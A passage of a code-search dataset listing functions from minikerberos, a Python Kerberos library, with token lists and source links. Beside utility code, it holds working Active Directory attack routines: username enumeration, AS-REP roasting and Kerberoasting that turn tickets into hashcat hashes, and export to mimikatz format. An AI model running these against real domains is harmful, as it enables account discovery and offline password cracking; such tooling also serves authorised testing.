] | Converts all credential object in the CCACHE object to the kirbi file format used by mimikatz.
The kirbi file format supports one credential per file, so prepare for a lot of files being generated.
directory_path: str the directory to write the kirbi files to | [
"Converts",
"all",
"credential",
"object",
"in",
"the",
"CCACHE",
"object",
"to",
"the",
"kirbi",
"file",
"format",
"used",
"by",
"mimikatz",
".",
"The",
"kirbi",
"file",
"format",
"supports",
"one",
"credential",
"per",
"file",
"so",
"prepare",
"for",
"a",
"lot",
"of",
"files",
"being",
"generated",
".",
"directory_path",
":",
"str",
"the",
"directory",
"to",
"write",
"the",
"kirbi",
"files",
"to"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L652-L665 |
skelsec/minikerberos | minikerberos/ccache.py | CCACHE.to_file | def to_file(self, filename):
"""
Writes the contents of the CCACHE object to a file
"""
with open(filename, 'wb') as f:
f.write(self.to_bytes()) | python | def to_file(self, filename):
"""
Writes the contents of the CCACHE object to a file
"""
with open(filename, 'wb') as f:
f.write(self.to_bytes()) | [
"def",
"to_file",
"(",
"self",
",",
"filename",
")",
":",
"with",
"open",
"(",
"filename",
",",
"'wb'",
")",
"as",
"f",
":",
"f",
".",
"write",
"(",
"self",
".",
"to_bytes",
"(",
")",
")"
] | Writes the contents of the CCACHE object to a file | [
"Writes",
"the",
"contents",
"of",
"the",
"CCACHE",
"object",
"to",
"a",
"file"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/ccache.py#L674-L679 |
skelsec/minikerberos | minikerberos/common.py | print_table | def print_table(lines, separate_head=True):
"""Prints a formatted table given a 2 dimensional array"""
#Count the column width
widths = []
for line in lines:
for i,size in enumerate([len(x) for x in line]):
while i >= len(widths):
widths.append(0)
if size > widths[i]:
widths[i] = size
#Generate the format string to pad the columns
print_string = ""
for i,width in enumerate(widths):
print_string += "{" + str(i) + ":" + str(width) + "} | "
if (len(print_string) == 0):
return
print_string = print_string[:-3]
#Print the actual data
for i,line in enumerate(lines):
print(print_string.format(*line))
if (i == 0 and separate_head):
print("-"*(sum(widths)+3*(len(widths)-1))) | python | def print_table(lines, separate_head=True):
"""Prints a formatted table given a 2 dimensional array"""
#Count the column width
widths = []
for line in lines:
for i,size in enumerate([len(x) for x in line]):
while i >= len(widths):
widths.append(0)
if size > widths[i]:
widths[i] = size
#Generate the format string to pad the columns
print_string = ""
for i,width in enumerate(widths):
print_string += "{" + str(i) + ":" + str(width) + "} | "
if (len(print_string) == 0):
return
print_string = print_string[:-3]
#Print the actual data
for i,line in enumerate(lines):
print(print_string.format(*line))
if (i == 0 and separate_head):
print("-"*(sum(widths)+3*(len(widths)-1))) | [
"def",
"print_table",
"(",
"lines",
",",
"separate_head",
"=",
"True",
")",
":",
"#Count the column width",
"widths",
"=",
"[",
"]",
"for",
"line",
"in",
"lines",
":",
"for",
"i",
",",
"size",
"in",
"enumerate",
"(",
"[",
"len",
"(",
"x",
")",
"for",
"x",
"in",
"line",
"]",
")",
":",
"while",
"i",
">=",
"len",
"(",
"widths",
")",
":",
"widths",
".",
"append",
"(",
"0",
")",
"if",
"size",
">",
"widths",
"[",
"i",
"]",
":",
"widths",
"[",
"i",
"]",
"=",
"size",
"#Generate the format string to pad the columns",
"print_string",
"=",
"\"\"",
"for",
"i",
",",
"width",
"in",
"enumerate",
"(",
"widths",
")",
":",
"print_string",
"+=",
"\"{\"",
"+",
"str",
"(",
"i",
")",
"+",
"\":\"",
"+",
"str",
"(",
"width",
")",
"+",
"\"} | \"",
"if",
"(",
"len",
"(",
"print_string",
")",
"==",
"0",
")",
":",
"return",
"print_string",
"=",
"print_string",
"[",
":",
"-",
"3",
"]",
"#Print the actual data",
"for",
"i",
",",
"line",
"in",
"enumerate",
"(",
"lines",
")",
":",
"print",
"(",
"print_string",
".",
"format",
"(",
"*",
"line",
")",
")",
"if",
"(",
"i",
"==",
"0",
"and",
"separate_head",
")",
":",
"print",
"(",
"\"-\"",
"*",
"(",
"sum",
"(",
"widths",
")",
"+",
"3",
"*",
"(",
"len",
"(",
"widths",
")",
"-",
"1",
")",
")",
")"
] | Prints a formatted table given a 2 dimensional array | [
"Prints",
"a",
"formatted",
"table",
"given",
"a",
"2",
"dimensional",
"array"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/common.py#L246-L269 |
skelsec/minikerberos | minikerberos/common.py | KerberosCredential.get_key_for_enctype | def get_key_for_enctype(self, etype):
"""
Returns the encryption key bytes for the enctryption type.
"""
if etype == EncryptionType.AES256_CTS_HMAC_SHA1_96:
if self.kerberos_key_aes_256:
return bytes.fromhex(self.kerberos_key_aes_256)
if self.password is not None:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.AES256, self.password.encode(), salt).contents
raise Exception('There is no key for AES256 encryption')
elif etype == EncryptionType.AES128_CTS_HMAC_SHA1_96:
if self.kerberos_key_aes_128:
return bytes.fromhex(self.kerberos_key_aes_128)
if self.password is not None:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.AES128, self.password.encode(), salt).contents
raise Exception('There is no key for AES128 encryption')
elif etype == EncryptionType.ARCFOUR_HMAC_MD5:
if self.kerberos_key_rc4:
return bytes.fromhex(self.kerberos_key_rc4)
if self.nt_hash:
return bytes.fromhex(self.nt_hash)
elif self.password:
self.nt_hash = hashlib.new('md4', self.password.encode('utf-16-le')).hexdigest().upper()
return bytes.fromhex(self.nt_hash)
else:
raise Exception('There is no key for RC4 encryption')
elif etype == EncryptionType.DES3_CBC_SHA1:
if self.kerberos_key_des3:
return bytes.fromhex(self.kerberos_key_des)
elif self.password:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.DES3, self.password.encode(), salt).contents
else:
raise Exception('There is no key for DES3 encryption')
elif etype == EncryptionType.DES_CBC_MD5: #etype == EncryptionType.DES_CBC_CRC or etype == EncryptionType.DES_CBC_MD4 or
if self.kerberos_key_des:
return bytes.fromhex(self.kerberos_key_des)
elif self.password:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.DES_MD5, self.password.encode(), salt).contents
else:
raise Exception('There is no key for DES3 encryption')
else:
raise Exception('Unsupported encryption type: %s' % etype.name) | python | def get_key_for_enctype(self, etype):
"""
Returns the encryption key bytes for the enctryption type.
"""
if etype == EncryptionType.AES256_CTS_HMAC_SHA1_96:
if self.kerberos_key_aes_256:
return bytes.fromhex(self.kerberos_key_aes_256)
if self.password is not None:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.AES256, self.password.encode(), salt).contents
raise Exception('There is no key for AES256 encryption')
elif etype == EncryptionType.AES128_CTS_HMAC_SHA1_96:
if self.kerberos_key_aes_128:
return bytes.fromhex(self.kerberos_key_aes_128)
if self.password is not None:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.AES128, self.password.encode(), salt).contents
raise Exception('There is no key for AES128 encryption')
elif etype == EncryptionType.ARCFOUR_HMAC_MD5:
if self.kerberos_key_rc4:
return bytes.fromhex(self.kerberos_key_rc4)
if self.nt_hash:
return bytes.fromhex(self.nt_hash)
elif self.password:
self.nt_hash = hashlib.new('md4', self.password.encode('utf-16-le')).hexdigest().upper()
return bytes.fromhex(self.nt_hash)
else:
raise Exception('There is no key for RC4 encryption')
elif etype == EncryptionType.DES3_CBC_SHA1:
if self.kerberos_key_des3:
return bytes.fromhex(self.kerberos_key_des)
elif self.password:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.DES3, self.password.encode(), salt).contents
else:
raise Exception('There is no key for DES3 encryption')
elif etype == EncryptionType.DES_CBC_MD5: #etype == EncryptionType.DES_CBC_CRC or etype == EncryptionType.DES_CBC_MD4 or
if self.kerberos_key_des:
return bytes.fromhex(self.kerberos_key_des)
elif self.password:
salt = (self.domain.upper() + self.username).encode()
return string_to_key(Enctype.DES_MD5, self.password.encode(), salt).contents
else:
raise Exception('There is no key for DES3 encryption')
else:
raise Exception('Unsupported encryption type: %s' % etype.name) | [
"def",
"get_key_for_enctype",
"(",
"self",
",",
"etype",
")",
":",
"if",
"etype",
"==",
"EncryptionType",
".",
"AES256_CTS_HMAC_SHA1_96",
":",
"if",
"self",
".",
"kerberos_key_aes_256",
":",
"return",
"bytes",
".",
"fromhex",
"(",
"self",
".",
"kerberos_key_aes_256",
")",
"if",
"self",
".",
"password",
"is",
"not",
"None",
":",
"salt",
"=",
"(",
"self",
".",
"domain",
".",
"upper",
"(",
")",
"+",
"self",
".",
"username",
")",
".",
"encode",
"(",
")",
"return",
"string_to_key",
"(",
"Enctype",
".",
"AES256",
",",
"self",
".",
"password",
".",
"encode",
"(",
")",
",",
"salt",
")",
".",
"contents",
"raise",
"Exception",
"(",
"'There is no key for AES256 encryption'",
")",
"elif",
"etype",
"==",
"EncryptionType",
".",
"AES128_CTS_HMAC_SHA1_96",
":",
"if",
"self",
".",
"kerberos_key_aes_128",
":",
"return",
"bytes",
".",
"fromhex",
"(",
"self",
".",
"kerberos_key_aes_128",
")",
"if",
"self",
".",
"password",
"is",
"not",
"None",
":",
"salt",
"=",
"(",
"self",
".",
"domain",
".",
"upper",
"(",
")",
"+",
"self",
".",
"username",
")",
".",
"encode",
"(",
")",
"return",
"string_to_key",
"(",
"Enctype",
".",
"AES128",
",",
"self",
".",
"password",
".",
"encode",
"(",
")",
",",
"salt",
")",
".",
"contents",
"raise",
"Exception",
"(",
"'There is no key for AES128 encryption'",
")",
"elif",
"etype",
"==",
"EncryptionType",
".",
"ARCFOUR_HMAC_MD5",
":",
"if",
"self",
".",
"kerberos_key_rc4",
":",
"return",
"bytes",
".",
"fromhex",
"(",
"self",
".",
"kerberos_key_rc4",
")",
"if",
"self",
".",
"nt_hash",
":",
"return",
"bytes",
".",
"fromhex",
"(",
"self",
".",
"nt_hash",
")",
"elif",
"self",
".",
"password",
":",
"self",
".",
"nt_hash",
"=",
"hashlib",
".",
"new",
"(",
"'md4'",
",",
"self",
".",
"password",
".",
"encode",
"(",
"'utf-16-le'",
")",
")",
".",
"hexdigest",
"(",
")",
".",
"upper",
"(",
")",
"return",
"bytes",
".",
"fromhex",
"(",
"self",
".",
"nt_hash",
")",
"else",
":",
"raise",
"Exception",
"(",
"'There is no key for RC4 encryption'",
")",
"elif",
"etype",
"==",
"EncryptionType",
".",
"DES3_CBC_SHA1",
":",
"if",
"self",
".",
"kerberos_key_des3",
":",
"return",
"bytes",
".",
"fromhex",
"(",
"self",
".",
"kerberos_key_des",
")",
"elif",
"self",
".",
"password",
":",
"salt",
"=",
"(",
"self",
".",
"domain",
".",
"upper",
"(",
")",
"+",
"self",
".",
"username",
")",
".",
"encode",
"(",
")",
"return",
"string_to_key",
"(",
"Enctype",
".",
"DES3",
",",
"self",
".",
"password",
".",
"encode",
"(",
")",
",",
"salt",
")",
".",
"contents",
"else",
":",
"raise",
"Exception",
"(",
"'There is no key for DES3 encryption'",
")",
"elif",
"etype",
"==",
"EncryptionType",
".",
"DES_CBC_MD5",
":",
"#etype == EncryptionType.DES_CBC_CRC or etype == EncryptionType.DES_CBC_MD4 or ",
"if",
"self",
".",
"kerberos_key_des",
":",
"return",
"bytes",
".",
"fromhex",
"(",
"self",
".",
"kerberos_key_des",
")",
"elif",
"self",
".",
"password",
":",
"salt",
"=",
"(",
"self",
".",
"domain",
".",
"upper",
"(",
")",
"+",
"self",
".",
"username",
")",
".",
"encode",
"(",
")",
"return",
"string_to_key",
"(",
"Enctype",
".",
"DES_MD5",
",",
"self",
".",
"password",
".",
"encode",
"(",
")",
",",
"salt",
")",
".",
"contents",
"else",
":",
"raise",
"Exception",
"(",
"'There is no key for DES3 encryption'",
")",
"else",
":",
"raise",
"Exception",
"(",
"'Unsupported encryption type: %s'",
"%",
"etype",
".",
"name",
")"
] | Returns the encryption key bytes for the enctryption type. | [
"Returns",
"the",
"encryption",
"key",
"bytes",
"for",
"the",
"enctryption",
"type",
"."
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/common.py#L54-L101 |
skelsec/minikerberos | minikerberos/common.py | KerberosCredential.from_connection_string | def from_connection_string(s):
"""
Credential input format:
<domain>/<username>/<secret_type>:<secret>@<dc_ip_or_hostname>
"""
cred = KerberosCredential()
cred.domain, t = s.split('/', 1)
cred.username, t = t.split('/', 1)
secret_type, t = t.split(':', 1)
secret, target = t.rsplit('@', 1)
st = KerberosSecretType(secret_type.upper())
if st == KerberosSecretType.PASSWORD or st == KerberosSecretType.PW or st == KerberosSecretType.PASS:
cred.password = secret
elif st == KerberosSecretType.NT or st == KerberosSecretType.RC4:
cred.nt_hash = secret
cred.kerberos_key_rc4 = secret
elif st == KerberosSecretType.AES:
cred.kerberos_key_aes_256 = secret
cred.kerberos_key_aes_128 = secret
elif st == KerberosSecretType.DES:
cred.kerberos_key_des = secret
elif st == KerberosSecretType.DES3 or st == KerberosSecretType.TDES:
cred.kerberos_key_des3 = secret
elif st == KerberosSecretType.CCACHE:
cred.ccache = CCACHE.from_file(secret)
return cred | python | def from_connection_string(s):
"""
Credential input format:
<domain>/<username>/<secret_type>:<secret>@<dc_ip_or_hostname>
"""
cred = KerberosCredential()
cred.domain, t = s.split('/', 1)
cred.username, t = t.split('/', 1)
secret_type, t = t.split(':', 1)
secret, target = t.rsplit('@', 1)
st = KerberosSecretType(secret_type.upper())
if st == KerberosSecretType.PASSWORD or st == KerberosSecretType.PW or st == KerberosSecretType.PASS:
cred.password = secret
elif st == KerberosSecretType.NT or st == KerberosSecretType.RC4:
cred.nt_hash = secret
cred.kerberos_key_rc4 = secret
elif st == KerberosSecretType.AES:
cred.kerberos_key_aes_256 = secret
cred.kerberos_key_aes_128 = secret
elif st == KerberosSecretType.DES:
cred.kerberos_key_des = secret
elif st == KerberosSecretType.DES3 or st == KerberosSecretType.TDES:
cred.kerberos_key_des3 = secret
elif st == KerberosSecretType.CCACHE:
cred.ccache = CCACHE.from_file(secret)
return cred | [
"def",
"from_connection_string",
"(",
"s",
")",
":",
"cred",
"=",
"KerberosCredential",
"(",
")",
"cred",
".",
"domain",
",",
"t",
"=",
"s",
".",
"split",
"(",
"'/'",
",",
"1",
")",
"cred",
".",
"username",
",",
"t",
"=",
"t",
".",
"split",
"(",
"'/'",
",",
"1",
")",
"secret_type",
",",
"t",
"=",
"t",
".",
"split",
"(",
"':'",
",",
"1",
")",
"secret",
",",
"target",
"=",
"t",
".",
"rsplit",
"(",
"'@'",
",",
"1",
")",
"st",
"=",
"KerberosSecretType",
"(",
"secret_type",
".",
"upper",
"(",
")",
")",
"if",
"st",
"==",
"KerberosSecretType",
".",
"PASSWORD",
"or",
"st",
"==",
"KerberosSecretType",
".",
"PW",
"or",
"st",
"==",
"KerberosSecretType",
".",
"PASS",
":",
"cred",
".",
"password",
"=",
"secret",
"elif",
"st",
"==",
"KerberosSecretType",
".",
"NT",
"or",
"st",
"==",
"KerberosSecretType",
".",
"RC4",
":",
"cred",
".",
"nt_hash",
"=",
"secret",
"cred",
".",
"kerberos_key_rc4",
"=",
"secret",
"elif",
"st",
"==",
"KerberosSecretType",
".",
"AES",
":",
"cred",
".",
"kerberos_key_aes_256",
"=",
"secret",
"cred",
".",
"kerberos_key_aes_128",
"=",
"secret",
"elif",
"st",
"==",
"KerberosSecretType",
".",
"DES",
":",
"cred",
".",
"kerberos_key_des",
"=",
"secret",
"elif",
"st",
"==",
"KerberosSecretType",
".",
"DES3",
"or",
"st",
"==",
"KerberosSecretType",
".",
"TDES",
":",
"cred",
".",
"kerberos_key_des3",
"=",
"secret",
"elif",
"st",
"==",
"KerberosSecretType",
".",
"CCACHE",
":",
"cred",
".",
"ccache",
"=",
"CCACHE",
".",
"from_file",
"(",
"secret",
")",
"return",
"cred"
] | Credential input format:
<domain>/<username>/<secret_type>:<secret>@<dc_ip_or_hostname> | [
"Credential",
"input",
"format",
":",
"<domain",
">",
"/",
"<username",
">",
"/",
"<secret_type",
">",
":",
"<secret",
">"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/common.py#L174-L208 |
skelsec/minikerberos | minikerberos/security.py | KerberosUserEnum.run | def run(self, realm, users):
"""
Requests a TGT in the name of the users specified in users.
Returns a list of usernames that are in the domain.
realm: kerberos realm (domain name of the corp)
users: list : list of usernames to test
"""
existing_users = []
for user in users:
logging.debug('Probing user %s' % user)
req = KerberosUserEnum.construct_tgt_req(realm, user)
rep = self.ksoc.sendrecv(req.dump(), throw = False)
if rep.name != 'KRB_ERROR':
# user doesnt need preauth, but it exists
existing_users.append(user)
elif rep.native['error-code'] != KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED.value:
# any other error means user doesnt exist
continue
else:
# preauth needed, only if user exists
existing_users.append(user)
return existing_users | python | def run(self, realm, users):
"""
Requests a TGT in the name of the users specified in users.
Returns a list of usernames that are in the domain.
realm: kerberos realm (domain name of the corp)
users: list : list of usernames to test
"""
existing_users = []
for user in users:
logging.debug('Probing user %s' % user)
req = KerberosUserEnum.construct_tgt_req(realm, user)
rep = self.ksoc.sendrecv(req.dump(), throw = False)
if rep.name != 'KRB_ERROR':
# user doesnt need preauth, but it exists
existing_users.append(user)
elif rep.native['error-code'] != KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED.value:
# any other error means user doesnt exist
continue
else:
# preauth needed, only if user exists
existing_users.append(user)
return existing_users | [
"def",
"run",
"(",
"self",
",",
"realm",
",",
"users",
")",
":",
"existing_users",
"=",
"[",
"]",
"for",
"user",
"in",
"users",
":",
"logging",
".",
"debug",
"(",
"'Probing user %s'",
"%",
"user",
")",
"req",
"=",
"KerberosUserEnum",
".",
"construct_tgt_req",
"(",
"realm",
",",
"user",
")",
"rep",
"=",
"self",
".",
"ksoc",
".",
"sendrecv",
"(",
"req",
".",
"dump",
"(",
")",
",",
"throw",
"=",
"False",
")",
"if",
"rep",
".",
"name",
"!=",
"'KRB_ERROR'",
":",
"# user doesnt need preauth, but it exists",
"existing_users",
".",
"append",
"(",
"user",
")",
"elif",
"rep",
".",
"native",
"[",
"'error-code'",
"]",
"!=",
"KerberosErrorCode",
".",
"KDC_ERR_PREAUTH_REQUIRED",
".",
"value",
":",
"# any other error means user doesnt exist",
"continue",
"else",
":",
"# preauth needed, only if user exists",
"existing_users",
".",
"append",
"(",
"user",
")",
"return",
"existing_users"
] | Requests a TGT in the name of the users specified in users.
Returns a list of usernames that are in the domain.
realm: kerberos realm (domain name of the corp)
users: list : list of usernames to test | [
"Requests",
"a",
"TGT",
"in",
"the",
"name",
"of",
"the",
"users",
"specified",
"in",
"users",
".",
"Returns",
"a",
"list",
"of",
"usernames",
"that",
"are",
"in",
"the",
"domain",
"."
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/security.py#L43-L69 |
skelsec/minikerberos | minikerberos/security.py | APREPRoast.run | def run(self, creds, override_etype = [23]):
"""
Requests TGT tickets for all users specified in the targets list
creds: list : the users to request the TGT tickets for
override_etype: list : list of supported encryption types
"""
tgts = []
for cred in creds:
try:
kcomm = KerbrosComm(cred, self.ksoc)
kcomm.get_TGT(override_etype = override_etype, decrypt_tgt = False)
tgts.append(kcomm.kerberos_TGT)
except Exception as e:
logger.debug('Error while roasting client %s/%s Reason: %s' % (cred.domain, cred.username, str(e)))
continue
results = []
for tgt in tgts:
results.append(TGTTicket2hashcat(tgt))
return results | python | def run(self, creds, override_etype = [23]):
"""
Requests TGT tickets for all users specified in the targets list
creds: list : the users to request the TGT tickets for
override_etype: list : list of supported encryption types
"""
tgts = []
for cred in creds:
try:
kcomm = KerbrosComm(cred, self.ksoc)
kcomm.get_TGT(override_etype = override_etype, decrypt_tgt = False)
tgts.append(kcomm.kerberos_TGT)
except Exception as e:
logger.debug('Error while roasting client %s/%s Reason: %s' % (cred.domain, cred.username, str(e)))
continue
results = []
for tgt in tgts:
results.append(TGTTicket2hashcat(tgt))
return results | [
"def",
"run",
"(",
"self",
",",
"creds",
",",
"override_etype",
"=",
"[",
"23",
"]",
")",
":",
"tgts",
"=",
"[",
"]",
"for",
"cred",
"in",
"creds",
":",
"try",
":",
"kcomm",
"=",
"KerbrosComm",
"(",
"cred",
",",
"self",
".",
"ksoc",
")",
"kcomm",
".",
"get_TGT",
"(",
"override_etype",
"=",
"override_etype",
",",
"decrypt_tgt",
"=",
"False",
")",
"tgts",
".",
"append",
"(",
"kcomm",
".",
"kerberos_TGT",
")",
"except",
"Exception",
"as",
"e",
":",
"logger",
".",
"debug",
"(",
"'Error while roasting client %s/%s Reason: %s'",
"%",
"(",
"cred",
".",
"domain",
",",
"cred",
".",
"username",
",",
"str",
"(",
"e",
")",
")",
")",
"continue",
"results",
"=",
"[",
"]",
"for",
"tgt",
"in",
"tgts",
":",
"results",
".",
"append",
"(",
"TGTTicket2hashcat",
"(",
"tgt",
")",
")",
"return",
"results"
] | Requests TGT tickets for all users specified in the targets list
creds: list : the users to request the TGT tickets for
override_etype: list : list of supported encryption types | [
"Requests",
"TGT",
"tickets",
"for",
"all",
"users",
"specified",
"in",
"the",
"targets",
"list",
"creds",
":",
"list",
":",
"the",
"users",
"to",
"request",
"the",
"TGT",
"tickets",
"for",
"override_etype",
":",
"list",
":",
"list",
"of",
"supported",
"encryption",
"types"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/security.py#L75-L96 |
skelsec/minikerberos | minikerberos/security.py | Kerberoast.run | def run(self, targets, override_etype = [2, 3, 16, 23, 17, 18]):
"""
Requests TGS tickets for all service users specified in the targets list
targets: list : the SPN users to request the TGS tickets for
allhash: bool : Return all enctype tickets, ot just 23
"""
if not self.kcomm:
try:
self.kcomm = KerbrosComm(self.ccred, self.ksoc)
self.kcomm.get_TGT()
except Exception as e:
logger.exception('Failed to get TGT ticket! Reason: %s' % str(e))
tgss = []
for target in targets:
try:
tgs, encTGSRepPart, key = self.kcomm.get_TGS(target, override_etype = override_etype)
tgss.append(tgs)
except Exception as e:
logger.debug('Failed to get TGS ticket for user %s/%s/%s! Reason: %s' % (target.domain, str(target.service), target.username, str(e)))
continue
results = []
for tgs in tgss:
results.append(TGSTicket2hashcat(tgs))
return results | python | def run(self, targets, override_etype = [2, 3, 16, 23, 17, 18]):
"""
Requests TGS tickets for all service users specified in the targets list
targets: list : the SPN users to request the TGS tickets for
allhash: bool : Return all enctype tickets, ot just 23
"""
if not self.kcomm:
try:
self.kcomm = KerbrosComm(self.ccred, self.ksoc)
self.kcomm.get_TGT()
except Exception as e:
logger.exception('Failed to get TGT ticket! Reason: %s' % str(e))
tgss = []
for target in targets:
try:
tgs, encTGSRepPart, key = self.kcomm.get_TGS(target, override_etype = override_etype)
tgss.append(tgs)
except Exception as e:
logger.debug('Failed to get TGS ticket for user %s/%s/%s! Reason: %s' % (target.domain, str(target.service), target.username, str(e)))
continue
results = []
for tgs in tgss:
results.append(TGSTicket2hashcat(tgs))
return results | [
"def",
"run",
"(",
"self",
",",
"targets",
",",
"override_etype",
"=",
"[",
"2",
",",
"3",
",",
"16",
",",
"23",
",",
"17",
",",
"18",
"]",
")",
":",
"if",
"not",
"self",
".",
"kcomm",
":",
"try",
":",
"self",
".",
"kcomm",
"=",
"KerbrosComm",
"(",
"self",
".",
"ccred",
",",
"self",
".",
"ksoc",
")",
"self",
".",
"kcomm",
".",
"get_TGT",
"(",
")",
"except",
"Exception",
"as",
"e",
":",
"logger",
".",
"exception",
"(",
"'Failed to get TGT ticket! Reason: %s'",
"%",
"str",
"(",
"e",
")",
")",
"tgss",
"=",
"[",
"]",
"for",
"target",
"in",
"targets",
":",
"try",
":",
"tgs",
",",
"encTGSRepPart",
",",
"key",
"=",
"self",
".",
"kcomm",
".",
"get_TGS",
"(",
"target",
",",
"override_etype",
"=",
"override_etype",
")",
"tgss",
".",
"append",
"(",
"tgs",
")",
"except",
"Exception",
"as",
"e",
":",
"logger",
".",
"debug",
"(",
"'Failed to get TGS ticket for user %s/%s/%s! Reason: %s'",
"%",
"(",
"target",
".",
"domain",
",",
"str",
"(",
"target",
".",
"service",
")",
",",
"target",
".",
"username",
",",
"str",
"(",
"e",
")",
")",
")",
"continue",
"results",
"=",
"[",
"]",
"for",
"tgs",
"in",
"tgss",
":",
"results",
".",
"append",
"(",
"TGSTicket2hashcat",
"(",
"tgs",
")",
")",
"return",
"results"
] | Requests TGS tickets for all service users specified in the targets list
targets: list : the SPN users to request the TGS tickets for
allhash: bool : Return all enctype tickets, ot just 23 | [
"Requests",
"TGS",
"tickets",
"for",
"all",
"service",
"users",
"specified",
"in",
"the",
"targets",
"list",
"targets",
":",
"list",
":",
"the",
"SPN",
"users",
"to",
"request",
"the",
"TGS",
"tickets",
"for",
"allhash",
":",
"bool",
":",
"Return",
"all",
"enctype",
"tickets",
"ot",
"just",
"23"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/security.py#L104-L132 |
skelsec/minikerberos | minikerberos/crypto/PBKDF2/pbkdf2.py | pbkdf2 | def pbkdf2(password, salt, iters, keylen, digestmod = hashlib.sha1):
"""Run the PBKDF2 (Password-Based Key Derivation Function 2) algorithm
and return the derived key. The arguments are:
password (bytes or bytearray) -- the input password
salt (bytes or bytearray) -- a cryptographic salt
iters (int) -- number of iterations
keylen (int) -- length of key to derive
digestmod -- a cryptographic hash function: either a module
supporting PEP 247, a hashlib constructor, or (in Python 3.4
or later) the name of a hash function.
For example:
>>> import hashlib
>>> from binascii import hexlify, unhexlify
>>> password = b'Squeamish Ossifrage'
>>> salt = unhexlify(b'1234567878563412')
>>> hexlify(pbkdf2(password, salt, 500, 16, hashlib.sha1))
b'9e8f1072bdf5ef042bd988c7da83e43b'
"""
h = hmac.new(password, digestmod=digestmod)
def prf(data):
hm = h.copy()
hm.update(data)
return bytearray(hm.digest())
key = bytearray()
i = 1
while len(key) < keylen:
T = U = prf(salt + struct.pack('>i', i))
for _ in range(iters - 1):
U = prf(U)
T = bytearray(x ^ y for x, y in zip(T, U))
key += T
i += 1
return key[:keylen] | python | def pbkdf2(password, salt, iters, keylen, digestmod = hashlib.sha1):
"""Run the PBKDF2 (Password-Based Key Derivation Function 2) algorithm
and return the derived key. The arguments are:
password (bytes or bytearray) -- the input password
salt (bytes or bytearray) -- a cryptographic salt
iters (int) -- number of iterations
keylen (int) -- length of key to derive
digestmod -- a cryptographic hash function: either a module
supporting PEP 247, a hashlib constructor, or (in Python 3.4
or later) the name of a hash function.
For example:
>>> import hashlib
>>> from binascii import hexlify, unhexlify
>>> password = b'Squeamish Ossifrage'
>>> salt = unhexlify(b'1234567878563412')
>>> hexlify(pbkdf2(password, salt, 500, 16, hashlib.sha1))
b'9e8f1072bdf5ef042bd988c7da83e43b'
"""
h = hmac.new(password, digestmod=digestmod)
def prf(data):
hm = h.copy()
hm.update(data)
return bytearray(hm.digest())
key = bytearray()
i = 1
while len(key) < keylen:
T = U = prf(salt + struct.pack('>i', i))
for _ in range(iters - 1):
U = prf(U)
T = bytearray(x ^ y for x, y in zip(T, U))
key += T
i += 1
return key[:keylen] | [
"def",
"pbkdf2",
"(",
"password",
",",
"salt",
",",
"iters",
",",
"keylen",
",",
"digestmod",
"=",
"hashlib",
".",
"sha1",
")",
":",
"h",
"=",
"hmac",
".",
"new",
"(",
"password",
",",
"digestmod",
"=",
"digestmod",
")",
"def",
"prf",
"(",
"data",
")",
":",
"hm",
"=",
"h",
".",
"copy",
"(",
")",
"hm",
".",
"update",
"(",
"data",
")",
"return",
"bytearray",
"(",
"hm",
".",
"digest",
"(",
")",
")",
"key",
"=",
"bytearray",
"(",
")",
"i",
"=",
"1",
"while",
"len",
"(",
"key",
")",
"<",
"keylen",
":",
"T",
"=",
"U",
"=",
"prf",
"(",
"salt",
"+",
"struct",
".",
"pack",
"(",
"'>i'",
",",
"i",
")",
")",
"for",
"_",
"in",
"range",
"(",
"iters",
"-",
"1",
")",
":",
"U",
"=",
"prf",
"(",
"U",
")",
"T",
"=",
"bytearray",
"(",
"x",
"^",
"y",
"for",
"x",
",",
"y",
"in",
"zip",
"(",
"T",
",",
"U",
")",
")",
"key",
"+=",
"T",
"i",
"+=",
"1",
"return",
"key",
"[",
":",
"keylen",
"]"
] | Run the PBKDF2 (Password-Based Key Derivation Function 2) algorithm
and return the derived key. The arguments are:
password (bytes or bytearray) -- the input password
salt (bytes or bytearray) -- a cryptographic salt
iters (int) -- number of iterations
keylen (int) -- length of key to derive
digestmod -- a cryptographic hash function: either a module
supporting PEP 247, a hashlib constructor, or (in Python 3.4
or later) the name of a hash function.
For example:
>>> import hashlib
>>> from binascii import hexlify, unhexlify
>>> password = b'Squeamish Ossifrage'
>>> salt = unhexlify(b'1234567878563412')
>>> hexlify(pbkdf2(password, salt, 500, 16, hashlib.sha1))
b'9e8f1072bdf5ef042bd988c7da83e43b' | [
"Run",
"the",
"PBKDF2",
"(",
"Password",
"-",
"Based",
"Key",
"Derivation",
"Function",
"2",
")",
"algorithm",
"and",
"return",
"the",
"derived",
"key",
".",
"The",
"arguments",
"are",
":"
] | train | https://github.com/skelsec/minikerberos/blob/caf14c1d0132119d6e8a8f05120efb7d0824b2c6/minikerberos/crypto/PBKDF2/pbkdf2.py#L7-L45 |
skelsec/minikerberos | minikerberos/communication.py | KerberosSocket.from_connection_string | def from_connection_string(s, soc_type = KerberosSocketType.TCP):
"""
<credentials>@<ip_or_hostname>:<port>
"""
ip = None
port = 88
t, addr = s.rsplit('@')
if addr.find(':') == -1:
ip = addr
else:
